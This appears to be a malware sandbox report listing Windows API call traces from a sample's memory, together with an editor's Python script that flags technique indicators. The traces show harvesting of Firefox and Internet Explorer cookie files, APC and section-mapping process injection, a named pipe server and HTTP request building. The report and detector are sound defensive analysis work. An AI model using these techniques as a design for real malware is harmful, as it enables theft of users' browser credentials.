  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
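Added example (editor's code, not Joe Sandbox output and not logic recovered from the sample): a small Python matcher that reads "APIs" listings in the format used throughout this report and flags functions whose import set fits a technique. The thread-enumeration function above (CreateToolhelp32Snapshot, Thread32First, OpenThread, QueueUserAPC, first ref 001CB391) is the APC-injection case; the function further up that combines NtCreateSection, NtMapViewOfSection and NtUnmapViewOfSection is the section-mapping case; the function walking %APPDATA%\Mozilla\Firefox\Profiles with FindFirstFileW and CopyFileW is the browser-profile case. The CreateNamedPipeA/CreateThread function listed further down is covered by a fourth indicator but not included in the excerpt. Indicator names and the API sets behind them are assumptions chosen for illustration, the embedded listings are copied from the report with lines omitted, and the GetComputerNameW function serves as a negative control.

```python
"""Flag technique indicators in Joe Sandbox "APIs" function listings.
Added example, not part of the report or the analysed sample; indicator names
and API sets are the editor's own heuristics, not Joe Sandbox classifications."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# One "APIs" bullet, direct or attributed to a callee ("Part of subcall function").
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$")

@dataclass
class ApiCall:
    name: str               # A/W suffix folded: FindFirstFileW -> FindFirstFile
    module: str
    args: List[str]
    ref: Optional[str]      # call-site address, when the listing gives one
    subcall: Optional[str]  # callee address for "Part of subcall function" lines

def normalize(name: str) -> str:
    """Drop a trailing A/W that follows a lowercase letter or digit (heuristic)."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", name)

def parse_call(line: str) -> Optional[ApiCall]:
    m = CALL_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return ApiCall(normalize(m.group("name")), m.group("module").upper(),
                   args.split(",") if args else [], m.group("ref"), m.group("sub"))

def split_functions(report_text: str) -> Dict[str, List[ApiCall]]:
    """A listing starts at an "APIs" header, ends at the next non-call line
    ("Strings", "Memory Dump Source") and is keyed by its first direct ref."""
    functions: Dict[str, List[ApiCall]] = {}
    current: Optional[List[ApiCall]] = None
    def close() -> None:
        if current:
            direct = [c for c in current if c.subcall is None and c.ref]
            functions[direct[0].ref if direct else f"fn{len(functions)}"] = current
    for line in report_text.splitlines():
        if line.strip() == "APIs":
            close()
            current = []
        elif current is None:
            continue
        elif (call := parse_call(line)) is not None:
            current.append(call)
        elif line.strip():
            close()
            current = None
    close()
    return functions

# (name, APIs that must all appear directly or via a callee, substrings that
# must each occur in some argument)
INDICATORS: List[Tuple[str, Set[str], Set[str]]] = [
    ("apc_injection", {"CreateToolhelp32Snapshot", "Thread32First", "OpenThread", "QueueUserAPC"}, set()),
    ("section_map_inject", {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"}, set()),
    ("named_pipe_server", {"CreateNamedPipe", "CreateThread"}, set()),
    ("browser_profile_harvest", {"FindFirstFile", "CopyFile"}, {r"Mozilla\Firefox\Profiles"}),
]

def match_indicators(calls: List[ApiCall]) -> List[str]:
    seen = {c.name for c in calls}
    arg_blob = "\n".join(a for c in calls for a in c.args)
    return [name for name, apis, substrs in INDICATORS
            if apis <= seen and all(s in arg_blob for s in substrs)]

def scan_report(report_text: str) -> Dict[str, List[str]]:
    return {ref: match_indicators(calls) for ref, calls in split_functions(report_text).items()}

# Listings copied (abridged) from the report above; the GetComputerName function
# is the negative control.
REPORT_EXCERPT = r"""
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
Memory Dump Source
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
Memory Dump Source
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
Strings
Memory Dump Source
APIs
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Memory Dump Source
"""
```

The matcher counts "Part of subcall function" lines as part of the caller, which is how Joe Sandbox attributes them, so a listing matches even when the decisive call (NtMapViewOfSection here) sits in a callee. Because the API sets are unordered, a hit is a triage filter rather than a verdict: confirm it against the function's disassembly before turning it into a detection rule.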
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
